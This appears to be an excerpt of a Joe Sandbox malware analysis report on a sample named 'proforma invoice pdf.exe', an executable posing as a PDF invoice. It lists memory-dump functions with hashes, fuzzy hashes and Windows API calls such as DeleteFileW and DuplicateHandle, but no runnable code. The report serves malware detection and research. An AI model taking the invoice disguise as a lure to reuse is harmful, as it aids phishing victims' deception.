Opcode ID: c5da13642e52114cfa7dd76b80b3baff8ebb000f905435f16917dc07cbfa5626
Instruction ID: ed8582820753abd3b6539991351d4a0942652cec40218074602ec6ce48bf7d85
Opcode Fuzzy Hash: c5da13642e52114cfa7dd76b80b3baff8ebb000f905435f16917dc07cbfa5626
Instruction Fuzzy Hash: C291FA71E106198FCB54CF69C880A9DF7F5FF89310F2486AAE419EB315EB31A985CB40

Function 0592B4DC Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1484602961.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5920000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a6af52be851f0729ac9ba443dffb3e177af0bf17d7a33d025b1db543c06a78c
Instruction ID: 48cd7864af4bfd7ebf0ead0a514d54a5d14ffc8a81fa2b3147c1776e893d676f
Opcode Fuzzy Hash: 1a6af52be851f0729ac9ba443dffb3e177af0bf17d7a33d025b1db543c06a78c
Instruction Fuzzy Hash: 1291EA35E106198FCB54CF69C8806ADF7F5FF89300F2486AAE419EB315EB71A985CB40

Function 0592ECB7 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1484602961.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5920000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5fdeeb854ea9e381767f3015747dafd3cfa6ae5f582b6207ba4c32681c20126
Instruction ID: 4a1f5654bf28576d1f246e59a830cbb09b71c01664afd23dfaaf7e5ce83bc270
Opcode Fuzzy Hash: e5fdeeb854ea9e381767f3015747dafd3cfa6ae5f582b6207ba4c32681c20126
Instruction Fuzzy Hash: 5191EA31E106198FCB54CF69C8806ADF7B5FF89300F2486AAE419EB315EB71A985CF40

Function 0730F260 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1486130672.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5ec37007cad956089680710509b35606bab8093c323dd83432ff6fa579062f7
Instruction ID: 15764b427d95bcfd9ee453c7474a14e8136ec6bb8044e59150e688aab2f98a4c
Opcode Fuzzy Hash: d5ec37007cad956089680710509b35606bab8093c323dd83432ff6fa579062f7
Instruction Fuzzy Hash: 84511DB4E0421A8FDB14DFA9C9805AEFBF2EF89311F24C169D418AB355D7319942CFA1

Function 073082A0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1486130672.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c00bcd499eb1e49f0cca073ade421cc8073d201b680e90829dabd4f7f1cf792d
Instruction ID: c69c3de7c35a2faa395156b45a3b3d736c6f989e494ce5499b6bd28a13fd07da
Opcode Fuzzy Hash: c00bcd499eb1e49f0cca073ade421cc8073d201b680e90829dabd4f7f1cf792d
Instruction Fuzzy Hash: 68211DB2E057089BEB18DF6B9C406DAFBFBAFC9210F04C076D40CA7264DB3505458E95

Function 073082F0 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1486130672.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 722d304287e5d005015ef9f4bf525f79418d9b42cf6ae0544baacd89d921333d
Instruction ID: a05735459b5475a687ec1c0ff3d14d9ec752dc71aece6f2922914ffc93ca6190
Opcode Fuzzy Hash: 722d304287e5d005015ef9f4bf525f79418d9b42cf6ae0544baacd89d921333d
Instruction Fuzzy Hash: A411CBB2E016189BEB58CF6B9C406DEFBF7AFC9200F04C07AD448A7264EB3515468E55

Function 053422A0 Relevance: 7.6, Strings: 6, Instructions: 102COMMON

Download Yara Rule

Strings

4'q, xrefs: 053423C3
4'q, xrefs: 0534237D
4'q, xrefs: 053423A0
4'q, xrefs: 053423E6
4'q, xrefs: 05342409
4'q, xrefs: 0534242C

Memory Dump Source

Source File: 00000000.00000002.1483707613.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$4'q$4'q
API String ID: 0-1794337482
Opcode ID: babbab4c5cd0933a11df7510a06d4bcd3d986ff28f80fb0a4c0d0e1fd732a3ac
Instruction ID: 9325983270ee7274f4ad0e906f3c2f4ba5c91b1e37da69f297e0abadb1bc40aa
Opcode Fuzzy Hash: babbab4c5cd0933a11df7510a06d4bcd3d986ff28f80fb0a4c0d0e1fd732a3ac
Instruction Fuzzy Hash: 0541DB70D512169FC748EF69F8915AE77B6FB88340B904969C015DB3E4EB305D61CF81

Function 053422B0 Relevance: 7.6, Strings: 6, Instructions: 95COMMON

Download Yara Rule

Strings

4'q, xrefs: 053423C3
4'q, xrefs: 0534237D
4'q, xrefs: 053423A0
4'q, xrefs: 053423E6
4'q, xrefs: 05342409
4'q, xrefs: 0534242C

Memory Dump Source

Source File: 00000000.00000002.1483707613.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5340000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$4'q$4'q
API String ID: 0-1794337482
Opcode ID: 89e9144e2779f89275fe32dda2d413af0c7749ef83b8a309d5665812d5287c16
Instruction ID: 4ebdef1b50078799dfa6e3b7cbb22b37cb23217e2a7348398011b6fcf656dfbe
Opcode Fuzzy Hash: 89e9144e2779f89275fe32dda2d413af0c7749ef83b8a309d5665812d5287c16
Instruction Fuzzy Hash: C741DB70E5121A9FC74CEF69F8915AE77B6FB88240B904A69C015DB3E4EB306D61CF81

Analysis Process: proforma invoice pdf.exePID: 2608, Parent PID: 2908COMMON

Execution Graph

Execution Coverage:	12.7%
Dynamic/Decrypted Code Coverage:	96.2%
Signature Coverage:	0%
Total number of Nodes:	105
Total number of Limit Nodes:	6

Executed Functions

Function 071A7E28 Relevance: 1.6, APIs: 1, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.3952504617.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_71a0000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e84c733bd5748600ebdd91103bea6ae0b28599f95a6ee9924b52d47f44911c7e
Instruction ID: 8dfdc34000b70957503106f75def06e8a615dbd0eb1483e413a19eeaa31cf85c
Opcode Fuzzy Hash: e84c733bd5748600ebdd91103bea6ae0b28599f95a6ee9924b52d47f44911c7e
Instruction Fuzzy Hash: 564128B1D043599FDB14DF69D8006DEBBF5EF89210F14856BD404E7681EB389944CBE1

Function 0137B253 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0137B36A

Memory Dump Source

Source File: 0000000A.00000002.3910147447.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_proforma invoice pdf.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 8bce73d61debaf37032175a4395db7ef04a92866ca3c5f89a5077ebff6a6375a
Instruction ID: 8e625fb36d72a6ea0c605e0f34b3c1a12d2afbbacc2879cfb3a71eddc0b0b3fd
Opcode Fuzzy Hash: 8bce73d61debaf37032175a4395db7ef04a92866ca3c5f89a5077ebff6a6375a
Instruction Fuzzy Hash: 5041C3B5D10348DFEB14CF99C884ADEFBB5BF48314F24812AE818AB254D7759945CF90

Function 0137B258 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0137B36A

Memory Dump Source

Source File: 0000000A.00000002.3910147447.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_proforma invoice pdf.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 75d1e10f0d2cb071cf3950c7ce1fc5951cd8a84b2bda6fd3a09f751f1d4175a0
Instruction ID: 10e3400132d0506136a1ee4ff85cf9603c08bb92dbf2296dc0829b5d50076acb
Opcode Fuzzy Hash: 75d1e10f0d2cb071cf3950c7ce1fc5951cd8a84b2bda6fd3a09f751f1d4175a0
Instruction Fuzzy Hash: FC41B1B1D10308EFEB14CF99C884ADEFBB5BF48314F24812AE818AB214D7759985CF90

Function 0137F130 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0137F1BF

Memory Dump Source

Source File: 0000000A.00000002.3910147447.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_proforma invoice pdf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 35e3e61104a9b9bd2bbd073ff25aa7cf98ec678fdfc11b9449f9a20d2951991b
Instruction ID: 31a27aa7cbab033c3139ac749ff24ab4a4a151c224797394583c89582d5010f6
Opcode Fuzzy Hash: 35e3e61104a9b9bd2bbd073ff25aa7cf98ec678fdfc11b9449f9a20d2951991b
Instruction Fuzzy Hash: 7221D2B5D00248EFDB10CFA9D984AEEBBF8EB48310F14841AE954B7750D378A944CF65

Function 0137F138 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0137F1BF

Memory Dump Source

Source File: 0000000A.00000002.3910147447.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_proforma invoice pdf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 63cef61362e2ca877fc0606950670d1676699b7b0d40ba144288d99c181d39a4
Instruction ID: 92203c5d043dfebdca31234fcabb4797faec329b67b71211ab0e94288f4177ba
Opcode Fuzzy Hash: 63cef61362e2ca877fc0606950670d1676699b7b0d40ba144288d99c181d39a4
Instruction Fuzzy Hash: 3121E5B5D00248EFDB10CF9AD884ADEBBF8FB48310F14841AE914A7350D378A944CF65

Function 07189F30 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 07189FA8

Memory Dump Source

Source File: 0000000A.00000002.3951843273.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7180000_proforma invoice pdf.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: c5184d83602026ad8e4d52a872f769b9945aaed0efdd091e04f8a627bda74c0a
Instruction ID: 7c25823ed4e5da12727ab0fe22da522b5912c813727e3217b8aac6b68918e726
Opcode Fuzzy Hash: c5184d83602026ad8e4d52a872f769b9945aaed0efdd091e04f8a627bda74c0a
Instruction Fuzzy Hash: 2D2104B6C0065A9FDB14DF9AC544BAEFBF4FB48310F14812AD818A7640D738AA45CFA5

Function 07189F38 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 07189FA8

Memory Dump Source

Source File: 0000000A.00000002.3951843273.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7180000_proforma invoice pdf.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 7b76c102401d88ad7e90aab5a19c53aa6b8c4bb997aa07e9182ee753a8e6245f
Instruction ID: 0ae5327283f9b05b7822e04d05ce826a127faef9b454b9511df2107896aa46fb
Opcode Fuzzy Hash: 7b76c102401d88ad7e90aab5a19c53aa6b8c4bb997aa07e9182ee753a8e6245f
Instruction Fuzzy Hash: BE1136B1C0065A9FDB14DF9AC544BEEFBF4EB48320F10812AD818B7640D738A944CFA5

Function 071A7F10 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 071A7F77

Memory Dump Source

Source File: 0000000A.00000002.3952504617.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_71a0000_proforma invoice pdf.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: ed896fe0073fdea929d7b626faf8e85b3a43e937499a367fb6e83fc38bd4d44c
Instruction ID: 45b050d269db8e837d499698b4a58bd2ec9ddfa3491929e248d5e41e5833273a
Opcode Fuzzy Hash: ed896fe0073fdea929d7b626faf8e85b3a43e937499a367fb6e83fc38bd4d44c
Instruction Fuzzy Hash: B21114B5C0065AEFDB10CF9AC444BDEFBF4AF48210F10812AD818B7640D378AA40CFA5

Function 013791B8 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0137A216

Memory Dump Source

Source File: 0000000A.00000002.3910147447.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_proforma invoice pdf.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4655e3c399458b53273c276983d087259ba7dd80e053de2dc92bb3686de5e37a
Instruction ID: 49710403e0fd80c1e11809d4d83b35f9fe468872c766c58fcf2823af1e2447ac
Opcode Fuzzy Hash: 4655e3c399458b53273c276983d087259ba7dd80e053de2dc92bb3686de5e37a
Instruction Fuzzy Hash: E61132B6C00249DFEB20CF9AD444BDEFBF4EB88214F14841AD818B7600C379A544CFA1

Function 0137A1AB Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0137A216

Memory Dump Source

Source File: 0000000A.00000002.3910147447.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_proforma invoice pdf.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c81e0f6db3a4a405e87b753e8aa363432ac5ed2c872d6cb32713ce2a10f5e22f
Instruction ID: 6a711a52d7677ca420658348debc47bd01d21eed64d064c2d9a75bfea8cd10be
Opcode Fuzzy Hash: c81e0f6db3a4a405e87b753e8aa363432ac5ed2c872d6cb32713ce2a10f5e22f
Instruction Fuzzy Hash: 41110FBAC00249CFEB24CF9AD944BDEFBF4EB48214F24841AD428B7611C379A545CFA1

Function 01082CA8 Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

;,, xrefs: 01082D48

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID: ;,
API String ID: 0-3931838279
Opcode ID: bb0c30b682a1eb99c54e2844f6db19c8be2734e348b3d85acb88377d3ae68c72
Instruction ID: 8c97ccf66d5ad5e2c53644914fc05c4f2d63749a267834f5d9b89b840b96f3a3
Opcode Fuzzy Hash: bb0c30b682a1eb99c54e2844f6db19c8be2734e348b3d85acb88377d3ae68c72
Instruction Fuzzy Hash: 4711E1307043028FD328AF38C45069ABBE6FF85328B20457CD1968B395EF719806CB90

Function 01082CB8 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

;,, xrefs: 01082D48

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID: ;,
API String ID: 0-3931838279
Opcode ID: 45d73f834941c93f22383bf11f4ed0302d54637743ba2f545db46f5e6147d81f
Instruction ID: 4b9e12480847521caf29760c27f452dfd4ccc1677ea19ae2f19373b830dd6281
Opcode Fuzzy Hash: 45d73f834941c93f22383bf11f4ed0302d54637743ba2f545db46f5e6147d81f
Instruction Fuzzy Hash: 0B1191707003018FD728AF39D45065AB7E6FF85368B20897CD1568B798EF719906CB90

Function 01081E98 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 404b3033c412c381c6f8fc65ca221f5152156dd304a7248acc84e39b1147a622
Instruction ID: 07b108bbb37c55ab70d13d2429e2052b75806e21068146981d2a77897806229c
Opcode Fuzzy Hash: 404b3033c412c381c6f8fc65ca221f5152156dd304a7248acc84e39b1147a622
Instruction Fuzzy Hash: D1717A31D043099FDB10EFA9D884AEEFBF5FF49310F10856AE485A7251EB34A986CB51

Function 01084C1C Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dae92abfb23c82b290c1d033c2d29984379fca4893160678a05a8c5917a662f
Instruction ID: 50e2bb2f8a8737e01b8294314f097bc2a7917b862c8ed3d38aa91dbb7a431016
Opcode Fuzzy Hash: 3dae92abfb23c82b290c1d033c2d29984379fca4893160678a05a8c5917a662f
Instruction Fuzzy Hash: 2B51E531F043069FDB05AFB8D9617AEBBF2EF85210F154499D581EB381DB349D018B91

Function 01081725 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5b615119efa42912a1c3a05f3c415e17d235583a680eb87369b553c7083af27
Instruction ID: 1df1898976449afa63611ba4206ace44880fbd81bca7791f27f6fbd200b762af
Opcode Fuzzy Hash: d5b615119efa42912a1c3a05f3c415e17d235583a680eb87369b553c7083af27
Instruction Fuzzy Hash: 0841FFB1C00309CFEB24DFA9C584ADEBBF5BF49300F20852AD448AB200D7756A46CF90

Function 01081730 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f9740c7fa99a978226b6f60b61996971523c50859f49e2b881b272880d49e18
Instruction ID: 59b01695c09f40b9774d822372dda88b8dbe6c2c650a967661e4b6d0e755af81
Opcode Fuzzy Hash: 2f9740c7fa99a978226b6f60b61996971523c50859f49e2b881b272880d49e18
Instruction Fuzzy Hash: B941E2B1D00349DFEB24DFAAC584ACEBBB5BF49304F24851AD448BB210D7756A46CF90

Function 01084DC7 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bd9d8e998bac3c3dedc40dafb96e630c16e4dc10e0b50da7749b950038495bc
Instruction ID: ca72ca0c0f2460f4ba5aab43443cd00b8be49a4ba4a0069db14127319ba0fcb6
Opcode Fuzzy Hash: 8bd9d8e998bac3c3dedc40dafb96e630c16e4dc10e0b50da7749b950038495bc
Instruction Fuzzy Hash: 673133B4D04208DFDB28DFA9C548B9EBBF1BB88314F20846EE484AB281C7755845CBA1

Function 01084AB7 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aec3fdd342dc469c087abe84bb137dc6607a762179828001ce516e0a50dec748
Instruction ID: 9383735cf2b2d916e57c4ae53899d0ffc6ff9b6b053928c59c5456dc7ffdd250
Opcode Fuzzy Hash: aec3fdd342dc469c087abe84bb137dc6607a762179828001ce516e0a50dec748
Instruction Fuzzy Hash: 45415B3090470ADFCB15EFA9C49069DFBF1FF89310F14C699D589AB265EB70A981CB90

Function 01081618 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e187ab2072ac9e5391880f6d89b12fb2f0e3fa26961b6b64b51bb213a9eff856
Instruction ID: c4331295582ab47a65c1bc764b1217582a1e0be4fc79b49b0edabe8e9f7aac84
Opcode Fuzzy Hash: e187ab2072ac9e5391880f6d89b12fb2f0e3fa26961b6b64b51bb213a9eff856
Instruction Fuzzy Hash: 0B3101756043828FCB11EF78C84449ABBF6FF8621471484AAD486CB355EF75990A8B92

Function 01081050 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e8b74ba5d1c87971da4bc97bd00d8ac1d3dfcc742e4ae28c2cca5a8d75f2214
Instruction ID: 531f3f76274d4d0572f11b7aea87ca31dca1fcd1ea77341678caf7233c8ec7a6
Opcode Fuzzy Hash: 0e8b74ba5d1c87971da4bc97bd00d8ac1d3dfcc742e4ae28c2cca5a8d75f2214
Instruction Fuzzy Hash: 6A210576A04316AFDB05EFB5DC009DEBBBAEFC5324B148076E454DB250DB71A906CB90

Function 0112D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3906666753.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_112d000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d260c4a1e7793cbce9ec2337262f10baee5f89bf4913b9ba7677d251b508fce
Instruction ID: 7586c58406b5916ace95643d7c81ff4d34c89b13cdce83bc61d06f746f85b846
Opcode Fuzzy Hash: 0d260c4a1e7793cbce9ec2337262f10baee5f89bf4913b9ba7677d251b508fce
Instruction Fuzzy Hash: B9212571504200DFDF19DF54E9C0B26BB61FB84314F20C56DE9094B2A2C33AD857CA66

Function 0112D3BC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3906666753.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_112d000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae91544d70c3728488e88b63d6ddb367bbb2e28daa9579c5b47678b05b71d348
Instruction ID: c00b4602bcd491af88d859209c47805656c88254c43699954f33e34d6983193d
Opcode Fuzzy Hash: ae91544d70c3728488e88b63d6ddb367bbb2e28daa9579c5b47678b05b71d348
Instruction Fuzzy Hash: 1F2125B1504240DFDF0DDF54E5C0B26BB61FB84314F20C56DE8094F692C336E456CA62

Function 0112D20C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3906666753.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_112d000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffe253cebd421807e4f7a216d30a2ad58e7aeec817bbb41fed9da468db837396
Instruction ID: 266a66649c9a88dfa69b6043bc4a308837f0aacf222bdcb8a95f37086dc9a153
Opcode Fuzzy Hash: ffe253cebd421807e4f7a216d30a2ad58e7aeec817bbb41fed9da468db837396
Instruction Fuzzy Hash: 18213872504344DFDF19DF54E5C4B26BB65FB85334F20C56DE8090B242C376D826CA62

Function 0112D118 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3906666753.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_112d000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d33b51e55b4019c8acaac90a114c6bd4e7a7701dcbe3f59354baa18c5b44e3f2
Instruction ID: 2f0530c67ffdbcffd2ae8060372072b5ff60695b68e6983b17a7c287d6b39bc7
Opcode Fuzzy Hash: d33b51e55b4019c8acaac90a114c6bd4e7a7701dcbe3f59354baa18c5b44e3f2
Instruction Fuzzy Hash: 0421CFB1604344EFDF1DDF64E9C0B26BBA5FB84218F30C56DE9094B692C336D856CA62

Function 01084DB8 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 644299f15a405d68c96c3c8cc272102c7ba284fcadccf0907591554f495e61ce
Instruction ID: 159a521641732440c5ec3e4d59c18b94cf93e99abbe2b1f8a02eb7a1dde7203b
Opcode Fuzzy Hash: 644299f15a405d68c96c3c8cc272102c7ba284fcadccf0907591554f495e61ce
Instruction Fuzzy Hash: 2F2144B5C15208DFEB24DF99C948BDEBBF0AF48314F24804AE888BB291C3765841CF61

Function 01084E10 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8fd4651d0b23024a5d0995a1c0fd38da6752955c8c818d2c139acf20cb56581
Instruction ID: 361846f599e5aad18e06859cb79236b927bf5a71d0de09a71b10a62e2c3fa729
Opcode Fuzzy Hash: e8fd4651d0b23024a5d0995a1c0fd38da6752955c8c818d2c139acf20cb56581
Instruction Fuzzy Hash: C831E3B4C14218DFEB24DF9AC588BCEBBF4BB48314F24805AE444BB280C7B55845CFA5

Function 01082054 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58ad819fd9cf1c2a843d74931bf42e61e779afaecd08b5e0a79ffe11ec1e1c52
Instruction ID: 8dfd41bca92f42fc5822022fc1e16c8c6702644b478b8497c197785650476e1a
Opcode Fuzzy Hash: 58ad819fd9cf1c2a843d74931bf42e61e779afaecd08b5e0a79ffe11ec1e1c52
